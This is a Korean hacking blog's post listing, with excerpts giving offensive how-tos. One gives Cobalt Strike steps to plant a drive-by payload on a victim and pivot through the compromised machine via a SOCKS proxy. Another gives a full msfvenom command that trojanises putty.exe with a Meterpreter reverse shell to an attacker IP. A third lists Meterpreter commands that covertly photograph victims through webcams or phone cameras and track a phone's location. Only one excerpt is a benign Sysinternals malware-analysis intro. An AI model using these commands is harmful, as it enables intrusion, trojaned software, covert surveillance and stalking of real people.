분류 전체보기257 내가 해킹한 컴퓨터로 다른 컴퓨터 해킹 [코볼트 스트라이크,proxy pivot] 1.코볼트 스트라이크 내에서 Attacks - web drive-by - smart applet attack 으로 악성코드를 만들어 줍니다. 2.로컬 URL 주소를 넣어주고 아이피는 공격자 아이피, 포트는 80으로 생성, 리스너를 생성해주는데 편한이름 편한 포트번호로 생성후 launch 3.피해자가 해당 url 주소에 들어가면 세션이 -> 피해자 컴퓨터에 우클릭 -> interact 클릭 4.밑의 명령프롬프트에 sleep 0를 넣어준다. [비컨 세션이 계속 연결됩니다. 디폴트는 60초로 60초마다 세션연결이 되는것] 5.socks [아무포트번호] 로 socks 서버를 오픈해줍니다. 6.상단 메뉴의 view - proxy pivots -> socks 서버를 누른뒤 tunnel 클릭 -> 나온 터널 링크 복.. 2023. 12. 27. 트로이목마 악성코드 분석해보기 [sysinternals 툴] https://docs.microsoft.com/ko-kr/sysinternals/downloads/ Sysinternals 유틸리티 - Sysinternals Sysinternals 유틸리티를 사용하여 Windows를 설치, 배포 및 유지 관리하는 방법을 평가하고 알아보세요. learn.microsoft.com 해당 사이트에서 악성코드 분석을 위한 도구들을 다운로드 받을수있습니다. 맨 위에 suite로 된 것을 받으면 모든 도구들을 받을 수 있습니다. 사용할 툴은 procexp 프로세스 익스플로러 와 procmon 프로세스 모니터 툴입니다. 1.procexp를 틀어둔 상태로 바이러스 파일과 감염되지 않은 파일을 실행시켜 줍니다. 차이점을 보면 바이러스 파일은 cpu 사용량이 많다는것, 용량이 더 높다는.. 2023. 12. 27. putty.exe 안에 트로이목마 넣기 우선적으로 윈도우의 putty.exe 실행파일을 칼리리눅스에 넣어줍니다. 그 후 다음 명령을 사용합니다. msfvenom -a x86 --platform windows -x putty.exe -k -p windows/meterpreter/reverse_tcp lhost=192.168.0.8 lport=4444 -e x86/shikata_ga_nai -i 3 -b "\x00" -f exe -o fakeputty.exe -a : 아키텍트 - x86 -x : putty.exe를 사용하겠다 -k : 오리지날 putty.exe를 keep 하겠다. -e : 인코딩 -i : 반복을 한다는것 인코딩을 3번 반복 -b : 인코딩할때 무시할 문자 -f : 파일 확장자 exe -o : output 실질적으로는 putty 뿐.. 2023. 12. 27. msfconsole 명령어 정리 - 핸드폰 위치추적 , 웹캠스냅[폰카메라 유출하기] sessions -i 로 세션을 잡은 상태에서 사용합니다. ->webcam_snap - 대상이 데스크톱이나 노트북이면 웹캠, 스마트폰이면 폰카를 잡아서 강제 촬영시키고 캡처본을 해커에게 보냅니다. ->geolocate - 대상 핸드폰의 위치를 위도 경도 정보를 보내주므로 구글맵에서 확인하면 위치 추적이 된다. 2023. 12. 27. 이전 1 ··· 24 25 26 27 28 29 30 ··· 65 다음